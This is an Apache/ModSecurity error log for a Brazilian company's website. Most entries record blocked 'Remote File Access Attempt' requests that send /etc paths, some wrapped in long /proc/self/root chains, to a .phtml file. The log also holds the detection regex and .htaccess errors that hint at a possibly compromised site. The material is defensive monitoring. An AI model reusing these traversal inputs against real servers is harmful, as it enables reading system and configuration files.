[Thu Mar 19 14:39:17.826659 2026] [:error] [pid 17653:tid 140411641214720] [client 57.141.18.4:48422] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0xcdf6f5d65gmYZSW2QAAAsw"]
[Thu Mar 19 14:39:18.326711 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.86:48432] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0xvqxLDW4GITHUkSE_AAAAQg"]
[Thu Mar 19 14:39:18.947056 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.111:48450] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0xgkwaGbbGflqUZDl5QAAAMw"]
[Thu Mar 19 14:39:19.287438 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.109:48458] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0xxCii7xarUs8iHYFxQAAAgs"]
[Thu Mar 19 14:39:20.652831 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.97:48494] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0yBCii7xarUs8iHYFxwAAAgw"]
[Thu Mar 19 14:39:21.332743 2026] [:error] [pid 17887:tid 140411632822016] [client 57.141.18.38:48516] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0yQkwaGbbGflqUZDl5wAAAM0"]
[Thu Mar 19 14:39:33.866962 2026] [:error] [pid 7235:tid 140411548894976] [client 57.141.18.1:48836] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw01fqxLDW4GITHUkSFDwAAARc"]
[Thu Mar 19 14:39:37.129811 2026] [proxy_fcgi:error] [pid 7545:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45446] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:40:00.129809 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46130] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:40:22.077824 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46686] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:40:35.409373 2026] [core:alert] [pid 7235:tid 140411548894976] [client 158.220.116.59:54480] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 14:40:44.136966 2026] [proxy_fcgi:error] [pid 7235:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47266] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:40:58.178931 2026] [access_compat:error] [pid 8307:tid 140411548894976] [client 45.71.218.61:24557] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 14:41:01.866731 2026] [core:alert] [pid 15826:tid 140411624429312] [client 57.141.18.73:51304] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:41:11.126019 2026] [proxy_fcgi:error] [pid 7545:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48010] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:41:33.125805 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48604] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:42:00.089770 2026] [proxy_fcgi:error] [pid 7545:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49420] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:42:12.048901 2026] [mime_magic:error] [pid 27293:tid 140411540502272] (70014)End of file found: [client 57.141.18.33:53430] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:42:29.129796 2026] [proxy_fcgi:error] [pid 7893:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50294] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:42:39.774819 2026] [core:alert] [pid 27293:tid 140411716749056] [client 57.141.18.50:54456] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:42:49.990975 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.228.61:48928] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw1mda6ubjKNq_cu4ZzmgAAA0U"]
[Thu Mar 19 14:42:59.125774 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51128] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:43:02.936171 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.244.43:50686] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw1pvqxLDW4GITHUkSFggAAAQ0"]
[Thu Mar 19 14:43:12.202450 2026] [core:alert] [pid 7235:tid 140411641214720] [client 57.141.18.60:55192] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:43:18.486727 2026] [mime_magic:error] [pid 8307:tid 140411632822016] (70014)End of file found: [client 57.141.18.25:55638] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:43:21.129830 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:43:42.129792 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52196] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:43:46.493026 2026] [core:alert] [pid 7235:tid 140411658000128] [client 57.141.18.14:56546] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 14:44:04.297780 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52806] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:44:26.125887 2026] [proxy_fcgi:error] [pid 27293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53496] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:44:50.133851 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54128] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:45:26.125792 2026] [proxy_fcgi:error] [pid 7545:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55142] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:45:54.117807 2026] [proxy_fcgi:error] [pid 8307:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55966] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:46:18.133782 2026] [proxy_fcgi:error] [pid 27293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56616] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:46:41.121870 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57260] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:46:42.821781 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] [client 209.141.47.233:58368] AH01071: Got error 'Primary script unknown'
[Thu Mar 19 14:47:03.129807 2026] [proxy_fcgi:error] [pid 8307:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58062] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:47:26.141773 2026] [proxy_fcgi:error] [pid 8307:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58834] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:47:48.045819 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59584] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:47:52.087033 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.228.61:51468] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw2yAkwaGbbGflqUZDnLQAAANE"]
[Thu Mar 19 14:48:06.452147 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.244.43:34960] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw21gkwaGbbGflqUZDnQQAAANg"]
[Thu Mar 19 14:48:11.480683 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:43954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw22wkwaGbbGflqUZDnRAAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:48:18.984354 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:36592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw24vu8EFLIOrSqIpvGHwAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:48:19.129777 2026] [proxy_fcgi:error] [pid 7893:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60510] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:48:23.699658 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:50492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw25_qxLDW4GITHUkSGYgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:48:32.551363 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:57856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw28PqxLDW4GITHUkSGagAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:48:42.843750 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:41564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw2-gbLMZ6AikZjR9V66wAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:48:47.143755 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33196] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:48:52.253411 2026] [:error] [pid 7545:tid 140411599251200] [client 74.7.243.128:38960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3BH8B84UptSoTJtYs9gAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:48:59.102989 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:38970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3C9a6ubjKNq_cu4Z0VgAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:04.619127 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:40552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3EPu8EFLIOrSqIpvGLQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:09.402676 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:51662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3Fda6ubjKNq_cu4Z0WwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
